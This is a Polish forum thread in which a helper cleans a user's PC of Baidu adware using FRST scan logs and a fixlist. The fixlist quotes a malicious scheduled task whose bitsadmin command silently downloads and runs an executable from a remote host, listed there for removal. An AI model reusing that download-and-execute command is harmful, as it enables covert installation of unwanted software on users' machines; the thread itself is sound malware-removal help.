Baidu hips - pobrał po cichu/oprog. szpiegujące + logi/autoruns

Dla specjalistów Bezpieczeństwo
#1

Nie wiem skąd, nie wiem jak… Czy za przypadkiem nie jest to oprogramowanie szpiegujące ?

 

FRST

http://www.wklej.org/hash/cf418e8e8b1/

 

Addition

http://www.wklej.org/hash/5d33fbc96be/

 

Po użyciu ADWcleaner ciągle tworzą się te 3 pliki

 

Ostatnie czyszczenie:

http://www.wklej.org/hash/19f86a63026/

 

Pierwsze czyszczenie

http://www.wklej.org/hash/95608a6e0fd/

 

W razie czego dołączam autoruns.

http://www21.zippyshare.com/v/amz5Wmlv/file.html

 

Nie wiem na jaki serwer dać, w razie problemów podajcie właściwy serwer. 

#2

Otwórz notatnik systemowy i wklej:

Task: {566C4269-6DB0-49ED-AEA0-9E526DD4A80F} - System32\Tasks\amiupdaterExd = cmd.exe /c start /min bitsadmin /transfer amijob /download /priority high http://d1sdn37tvpai3.cloudfront.net/Updater.exe "C:\Users\UKASZ~1\AppData\Local\Temp\amiupdater172.exe"
Task: {8D8CB9DE-CA1A-499E-9045-F30A5860D7BE} - System32\Tasks\amiupdaterExi = C:\Users\UKASZ~1\AppData\Local\Temp\amiupdater172.exe ==== ATTENTION
SearchScopes: HKU\.DEFAULT - DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-19 - DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-19-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0 - DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-20 - DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-20-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0 - DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
R1 BDMWrench_x64; C:\Windows\System32\DRIVERS\BDMWrench_x64.sys [56136 2014-11-06] (Baidu)
S4 bd0001; system32\DRIVERS\bd0001.sys [X]
S4 bd0002; system32\DRIVERS\bd0002.sys [X]
S4 BDDefense; \\C:\Windows\system32\drivers\BDDefense.sys [X]
2015-05-01 17:11 - 2015-05-01 17:21 - 00000000 ____ D () C:\AdwCleaner
2015-05-01 16:52 - 2014-11-06 09:38 - 00056136 _____ (Baidu) C:\Windows\system32\Drivers\BDMWrench_x64.sys
2015-05-01 16:51 - 2015-05-01 17:27 - 00003938 _____ () C:\Windows\System32\Tasks\amiupdaterExi
2015-05-01 16:51 - 2015-05-01 16:51 - 00003760 _____ () C:\Windows\System32\Tasks\amiupdaterExd
EmptyTemp:

Plik zapisz pod nazwą fixlist.txt i umieść obok FRST w tym samym folderze.

#3

Za pierwszy razem FRST nie znalazł 

S4 bd0001; system32\DRIVERS\bd0001.sys [X]
S4 bd0002; system32\DRIVERS\bd0002.sys [X]

S4 BDDefense; \\C:\Windows\system32\drivers\BDDefense.sys [X]

Więc fix’a użyłem 2 razy i teraz ADWcleaner nic znajduje, więc chyba problem rozwiązany :slight_smile:

 

Serdecznie dziękuję za pomoc Acorus :slight_smile:

#4

Skasuj folder C:\FRST

#5

Już to zrobiłem, dziękuję za pomoc :slight_smile: